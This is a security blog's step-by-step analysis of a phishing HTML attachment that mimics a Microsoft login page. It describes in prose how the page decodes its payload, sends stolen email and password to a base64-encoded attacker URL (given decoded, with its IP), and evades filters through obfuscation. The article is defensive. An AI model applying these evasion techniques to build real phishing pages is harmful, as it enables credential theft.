Deconstructing a Phishing Attack: A Step-by-Step Analysis

In this article, we will explore a detailed analysis of a phishing attack, focusing on how a seemingly legitimate password reset request turned out to be a sophisticated phishing attempt. This case study not only reveals the techniques used by attackers but also demonstrates how such threats can be decoded and mitigated. Additionally, we will delve into the obfuscation techniques employed by the attackers to circumvent common attachment filters and cybersecurity detection mechanisms.

Introduction: The Phishing Attempt

The phishing attempt began when a victim received an email containing a file named Password_Reset.htm, purportedly from their organization’s IT department. The email urged the victim to reset their compromised password by opening the attached file. Upon opening the file, the victim was presented with what appeared to be a legitimate Microsoft login page, complete with their email address pre-populated.

Pride Security Cybersecurity Specialists

Initial Analysis of the Phishing File

The file Password_Reset.htm was designed to mimic an official Microsoft login page, making it difficult for the average user to identify it as fraudulent. However, an examination of the inner contents of the file revealed several red flags:

Obfuscated JavaScript Payload: The script included a large, encoded payload designed to execute actions once decoded by a web browser.

Pre-populated Email Address: The victim’s email was already filled in, which is a common tactic used by phishing scams to lend credibility to the fake page.

Encoded Variables: The HTML file contained JavaScript variables, some of which were encoded, likely to obscure their true purpose from both users and automated security tools.

Decoding the Phishing Payload

The first major step in deconstructing this phishing attempt was to decode the obfuscated payload. By examining the script, it became clear that the returrn constant was associated with an x constant, where x[0] would return the first value in a list. This was further manipulated by a replaceAll(%3%) function, which substituted all instances of %3% with 3.

After replacing the encoded %3% values, the script was then passed through a unescape decoder, transforming it into a clear text HTML file, revealing the underlying malicious code.

Examining the Decoded Phishing Payload

The decoded payload revealed a complete HTML structure, including all necessary CSS for visual presentation and several JavaScript functions. A critical function identified in this payload was one that collected the user’s input (email and password), formatted it into a JSON string, and sent it to a remote server using a POST request.

  • Key Information Captured:
    • #ai: Victim’s email address
    • #pr: Victim’s password
  • The data was then sent to a remote URL that was base64 encoded. Decoding this string provided the URL https://ciepsa.net.br/a/c.php, which was designed to receive and potentially store the stolen credentials.

Resolving the Malicious URL

Further investigation into the URL revealed that it resolved to the IP address 15.235.14.75, associated with a now-suspended website hosted on servidorsaturno.com.br. Packet analysis of fake details entered into the malicious form confirmed that for was indeed sending POST requests to the server, which was actively receiving the credentials sent by the phishing script.

Obfuscation Techniques: Circumventing Detection Mechanisms

One of the key reasons this phishing attempt was able to bypass common cybersecurity defenses was due to the sophisticated obfuscation techniques employed by the attackers. These techniques are designed to hide the malicious intent of the script from both automated security tools and manual inspection. Here’s how they worked:

a. Base64 Encoding

The attackers used Base64 encoding to disguise URLs and sensitive parts of the code. Base64 encoding is a method of converting binary data into an ASCII string format. While this technique is commonly used for legitimate purposes, such as encoding data for transmission over the web, it is also frequently used by attackers to obfuscate malicious code.

In this case, the URL where the stolen credentials were sent was Base64 encoded as aHR0cHM6Ly9jaWVwc2EubmV0LmJyL2EvYy5waHA=. When decoded, it translated to https://ciepsa.net.br/a/c.php. By encoding the URL, the attackers made it less likely that security tools would recognize it as a known malicious site.

b. JavaScript Obfuscation

The JavaScript in the phishing file was intentionally written in a convoluted manner. For example, the use of complex variable names, unnecessary calculations, and encoding of certain characters within the script made it difficult for automated analysis tools to decipher the code’s true purpose.

Obfuscation of JavaScript can include techniques such as:

  • Variable Renaming: Changing variable names to nonsensical or misleading labels.
  • Code Flattening: Converting multiple lines of code into a single line, which reduces the readability.
  • String Manipulation: Encoding strings or breaking them into parts that are reassembled at runtime.

These techniques reduce the chances of the script being flagged by static analysis tools that look for patterns of known malicious behavior.

c. Dynamic Content Replacement

The script utilized dynamic content replacement, such as replaceAll(%3%), which replaced encoded placeholders with actual values during runtime. This means that until the script is executed, the true content remains hidden. Many security tools that scan attachments do not execute scripts in a dynamic environment, allowing such obfuscated scripts to pass through undetected.

Conclusion: Understanding the Phishing Mechanism

This phishing file was constructed to look indistinguishable from a legitimate Microsoft login page. The attackers employed multiple layers of obfuscation, including Base64 encoding, complex JavaScript obfuscation, and dynamic content replacement, to hide the true nature of the file from casual inspection and security software.

Once the victim entered their credentials, the data was sent to a PHP script on a remote server, which likely stored the information for future malicious use. This case highlights the importance of vigilance and the need for advanced security tools capable of detecting such well-disguised threats.

This phishing file was likely generated automatically using a phishing toolkit, which allowed the attacker to input a list of emails and launch a large-scale attack with minimal effort.

Mitigation and Prevention

To prevent falling victim to such attacks:

  • Always verify the authenticity of unsolicited emails, especially those requesting sensitive information.
  • Hover over links to check their actual destination before clicking.
  • Use advanced email filtering and security solutions that can detect obfuscated code and phishing attempts.
  • Employ dynamic analysis tools that can execute scripts in a safe environment to detect malicious behavior.

Understanding the inner workings of phishing attacks, as demonstrated in this analysis, is crucial for both IT professionals and end-users to better defend against such threats. The use of obfuscation techniques, while sophisticated, is not foolproof, and with the right knowledge and tools, these attacks can be detected and prevented.

By breaking down this phishing attack and examining the obfuscation techniques used, we can better educate others on the dangers lurking in seemingly legitimate emails and how to protect against them.

Leave a Reply